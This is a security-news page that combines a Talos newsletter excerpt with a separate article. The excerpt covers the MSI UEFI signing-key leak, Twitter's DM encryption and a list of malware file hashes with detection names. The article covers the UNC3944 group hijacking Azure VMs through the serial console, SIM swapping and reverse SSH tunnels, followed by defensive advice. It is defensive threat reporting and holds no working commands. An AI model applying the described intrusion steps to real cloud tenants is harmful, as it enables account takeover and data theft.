**A recent ransomware attack against Micro-Star International (MSI), including the theft of UEFI signing keys, is already having wide-ranging effects** across the security industry. MSI does not have a way to retract the keys after they were leaked onto the dark web, leading to fears of future supply chain attacks. Attackers could hypothetically inject malicious updates into legitimate software, using the MSI keys to sign them. MSI Keys are trusted by default by many end-user devices. Security researchers found that some of the keys work for the Intel BootGuard firmware-verification technology that runs on devices made by several different manufacturers. The Money Message ransomware group first claimed responsibility for the ransomware attack in April when it listed MSI as a new victim on its leak site and published screenshots purporting to show private encryption keys, source code and other data. (Decipher, Ars Technica)

**Twitter announced it was rolling out end-of-end encryption for its direct messages, though several security holes remain.** The company appears to not have actually completed a security audit of its DMs that it claimed it had, and the messages are still vulnerable to man-in-the-middle attacks. One security researcher also says it’s easy for Twitter employees to potentially hijack messages by adding their own keys to a list that are approved to read the messages. Encryption is also a paid feature — both users partaking in the messages must be either Twitter Blue subscribers or a verified organization on Twitter. Group conversations are also not included in this encryption process. Security and privacy experts say users who are looking for secure messaging should stick to encrypted apps like Telegram and Signal. (ZDNet, The Verge)

**Can’t get enough Talos?**

*   Talos Takes Ep. #138: What makes “Greatness” so great?
*   Beers with Talos Ep. #135: The XDR files
*   RA Group uses leaked Babuk code to attack companies in the US, South Korea
*   Cisco warns of new ‘Greatness’ phishing-as-a-service tool seen in the wild
*   New 'Greatness' service simplifies Microsoft 365 phishing attacks

**Upcoming events where you can find Talos**

**BSidesFortWayne** **(May 20)**

Fort Wayne, IN

**Threat Modeling webinar: Applying a Threat Informed Defense (May 23)**

Virtual

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Discover Cyber Workshop for Women (June 8)**

Doha, Qatar

**REcon** **(June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
**MD5:** df11b3105df8d7c70e7b501e210e3cc3  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 7c8e1dba5c1b84a08636d9e6f225e1e79bb346c176e0ee2ae1dfec18953a1ce2  
**MD5:** 3e0fb82ed8ea6cd7d1f1bb9dca5f2bdc  
**Typical Filename:** PDFShark.exe  
**Claimed Product:** PDFShark  
**Detection Name:** Win.Dropper.Razy::95.sbx.tg

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

It’s really OK to take a break sometimes, especially in security

Cybercrime group that often uses smishing for initial access bypassed traditional OS targeting and evasion techniques to directly gain access to the cloud.

A threat actor known for targeting Microsoft cloud environments now is employing the serial console feature on Azure virtual machines (VMs) to hijack the VM to install third-party remote management software within clients' cloud environments.

Tracked as UNC3944 by researchers at Mandiant Intelligence, the threat group is leveraging this attack method to skirt traditional security detections employed within Azure with a living-off-the-land (LotL) attack ultimately aimed at stealing data that it can use for financial gain, Mandiant researchers revealed in a blog post this week.

Using one of its typical method of initial access — which involves compromising admin credentials or accessing other privileged accounts via malicious smishing campaigns — UNC3944 establishes persistence using SIM swapping and gains full access to the Azure tenant, the researchers said.

From there, the attacker has a number of options for malicious activity, including the exportation of information about the users in the tenant, collection of information about the Azure environment configuration and the various VMs, and creation or modification of accounts.

"Mandiant has observed this attacker using their access to a highly privileged Azure account to leverage Azure Extensions for reconnaissance purposes," the researchers wrote. "These extensions are executed inside of a VM and have a variety of legitimate uses."

**Hijacking the VM**

By leveraging in particular the serial console in Microsoft Azure, UNC3944 can connect to a running OS via serial port, giving the attacker an option besides the OS to access a cloud environment.

"As with other virtualization platforms, the serial connection permits remote management of systems via the Azure console," they wrote. "The novel use of the serial console by attackers is a reminder that these attacks are no longer limited to the operating system layer."

UNC3944 is a financially motivated threat group active since last May that typically targets Microsoft environments for ultimate financial gain. The group was previously seen in December leveraging Microsoft-signed drivers for post-exploitation activities.

However, once UNC3944 takes control of an Azure environment and uses LotL tactics to move within a customer's cloud, the consequences go beyond mere data exfiltration or financial gain, one security expert notes.

"By gaining control of an organization's Azure environment, the threat actor can plant deepfakes, modify data, and even control IoT/OT assets that are often managed within the cloud," Bud Broomhead, CEO at Viakoo, a provider of automated IoT cyber hygiene, said in a statement sent to Dark Reading.

**From the VM to the Environment**

Mandiant detailed in the post how the threat actor targets the VM and ultimately installs commercially available remote management and administration tools within the Azure cloud environment to maintain presence.

"The advantage of using these tools is that they’re legitimately signed applications and provide the attacker remote access without triggering alerts in many endpoint detection platforms," the researchers wrote.

Before pivoting to another system, the attacker set up a reverse SSH (Secure Shell Protocol) tunnel to its command-and-control (C2) server and deployed a reverse tunnel configured such that port forwarding any inbound connection to remote machine port 12345 would be forwarded to the localhost port 3389, they explained in the post. This allowed UNC3944 a direct connection to the Azure VM via Remote Desktop, from which they can facilitate a password reset of an admin account, the researchers said.

The attack demonstrates the evolution and growth in sophistication of both attackers' evasion tactics and targeting, the latter of which now goes beyond the network and the endpoint directly to mobile devices and the cloud, notes Kern Smith, vice president of Americas, sales engineering at mobile security firm Zimperium.

"Increasingly, these attacks are targeting users where organizations have no visibility using traditional security tooling — such as smishing — in order to gain the information needed to enable these types of attacks," he says.

**How to Defend Against this VM Attack**

To thwart this type of threat, organizations must first prevent targeted smishing campaigns "in a way that enables their workforce while not inhibiting productivity or impacting user privacy," Smith says.

Mandiant recommends restricting access to remote administration channels and disabling SMS as a multifactor authentication method wherever possible.

"Additionally, Mandiant recommends reviewing user account permissions for overly permissive users and implementing appropriate Conditional Access Authentication Strength policies," the researchers wrote.

They also directed organizations to the available authentication methods in Azure AD on the Microsoft website, recommending that least-privilege access to the serial console be configured according to Microsoft's guidance.

Tag

#mac